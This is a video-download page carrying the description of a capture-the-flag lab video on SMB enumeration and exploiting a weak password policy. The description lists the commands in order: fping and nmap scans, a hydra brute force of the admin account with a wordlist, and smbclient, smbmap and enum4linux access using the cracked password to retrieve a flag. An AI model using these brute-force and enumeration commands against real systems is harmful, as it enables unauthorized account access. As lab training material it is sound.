Популярное

Музыка Кино и Анимация Автомобили Животные Спорт Путешествия Игры Юмор

Интересные видео

2025 Сериалы Трейлеры Новости Как сделать Видеоуроки Diy своими руками

Топ запросов

смотреть а4 schoolboy runaway турецкий сериал смотреть мультфильмы эдисон
dTub
Скачать

Project 91 - Enumerating The Details Of A Weak Password Policy w/ Enum4linux (CTF Edition)

Автор: Daryl Shows His Work

Загружено: 2025-12-01

Просмотров: 4

Описание:

Commands Used (in the order that they appear in the video):

1. Ifconfig

2. fping -a -g 192.128.15.0/24

3. nmap -sV 192.128.15.3

4. hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.128.15.3 smb (brute force admin account)

5. smbmap -H 192.128.15.3 -u admin -p password1 (displays shares and permissions)

6. smbclient -L 192.128.15.3 -U admin (password1, to display Workgroup along with shares)

7. smbclient //192.128.15.3/admin -U admin (password1, to gain access to a specific SMB user's interface)

8. ? (to display the list of commands that can be ran)

9. dir (to display the subdirectories)

10. cd hidden (to switch to hidden directory)

11. dir (to display the hidden directory's contents)

12. get flag.tar.gz (to download flag to local directory)

13. exit (to end smb session)

14. ls (to see flag.tar.gz in local directory)

15. tar -xvzf flag.tar.gz (to unzip compressed file)

16. cat flag (to display flag output)



Using enum4linux


17. enum4linux -a 192.128.15.3 (enumerates all information: usernames, workgroups & their status)

18. enum4linux -a -u admin -p password1 192.128.15.3 (for credentialed use. Provides even more information)

19. Scroll all the way back up to see other user accounts displayed and password policy

Project 91 - Enumerating The Details Of A Weak Password Policy w/ Enum4linux (CTF Edition)

Поделиться в:

Доступные форматы для скачивания:

Скачать видео mp4

  • Информация по загрузке:

Скачать аудио mp3

Похожие видео

Project 92 - Elevating User Privileges Through Misconfigured Cron Jobs (Capture The Flag Edition)

Project 92 - Elevating User Privileges Through Misconfigured Cron Jobs (Capture The Flag Edition)

Project 102 - What Is A Rejetto HTTP File Server and Why Is It A Popular Attack Vector? *CTF edition

Project 102 - What Is A Rejetto HTTP File Server and Why Is It A Popular Attack Vector? *CTF edition

Как американцы случайно подарили русским сверхзвуковой дрон за 400 миллионов | Lockheed D-21

Как американцы случайно подарили русским сверхзвуковой дрон за 400 миллионов | Lockheed D-21

БЕЛЫЕ СПИСКИ: какой VPN-протокол справится? Сравниваю все

БЕЛЫЕ СПИСКИ: какой VPN-протокол справится? Сравниваю все

Project 94 - Discovering A Version Specific Exploit Tool w/ Searchsploit & Cracking Password Hashes!

Project 94 - Discovering A Version Specific Exploit Tool w/ Searchsploit & Cracking Password Hashes!

Взломщик паролей с помощью блокнота!

Взломщик паролей с помощью блокнота!

Крах Jaguar: Как “повестка” в рекламе добила легенду британского автопрома

Крах Jaguar: Как “повестка” в рекламе добила легенду британского автопрома

Скрытый шпион вашего компьютера с Windows 11: тёмная правда о чипах TPM

Скрытый шпион вашего компьютера с Windows 11: тёмная правда о чипах TPM

LLM и GPT - как работают большие языковые модели? Визуальное введение в трансформеры

LLM и GPT - как работают большие языковые модели? Визуальное введение в трансформеры

AGI Достигнут! ChatGPT 5.2 Рвет ВСЕ Тесты! Внезапно OpenAI Выкатил Новую ИИ! Новая Qwen от Alibaba.

AGI Достигнут! ChatGPT 5.2 Рвет ВСЕ Тесты! Внезапно OpenAI Выкатил Новую ИИ! Новая Qwen от Alibaba.

«Вот теперь я задумался об эмиграции»: зачем Кремль заблокировал Roblox и как реагируют россияне

«Вот теперь я задумался об эмиграции»: зачем Кремль заблокировал Roblox и как реагируют россияне

System Design Concepts Course and Interview Prep

System Design Concepts Course and Interview Prep

Инженерные решения, управляющие цифровым миром 🛠️⚙️💻 Как работают процессоры?

Инженерные решения, управляющие цифровым миром 🛠️⚙️💻 Как работают процессоры?

Project 90 - Using Hydra To Brute Force SSH

Project 90 - Using Hydra To Brute Force SSH

Project 95 - Exploiting The NetBIOS Protocol To Access Sensitive Information On Two Target Machines!

Project 95 - Exploiting The NetBIOS Protocol To Access Sensitive Information On Two Target Machines!

Project 100 - Spoofing An Email Client To Send Fraudulent Mail

Project 100 - Spoofing An Email Client To Send Fraudulent Mail

Но что такое нейронная сеть? | Глава 1. Глубокое обучение

Но что такое нейронная сеть? | Глава 1. Глубокое обучение

Умер спустя 7 месяцев после нашего ремонта! ГАРАНТИЯ? Почему MSI RAIDER GE77 сыпятся и ненадежные?

Умер спустя 7 месяцев после нашего ремонта! ГАРАНТИЯ? Почему MSI RAIDER GE77 сыпятся и ненадежные?

Почему люди покупают НЕ те ноутбуки для хакинга

Почему люди покупают НЕ те ноутбуки для хакинга

OSINT | ЭТИ ИНСТРУМЕНТЫ ВЫЧИСЛЯТ ЛЮБОГО!

OSINT | ЭТИ ИНСТРУМЕНТЫ ВЫЧИСЛЯТ ЛЮБОГО!

© 2025 dtub. Все права защищены.



  • Контакты
  • О нас
  • Политика конфиденциальности



Контакты для правообладателей: [email protected]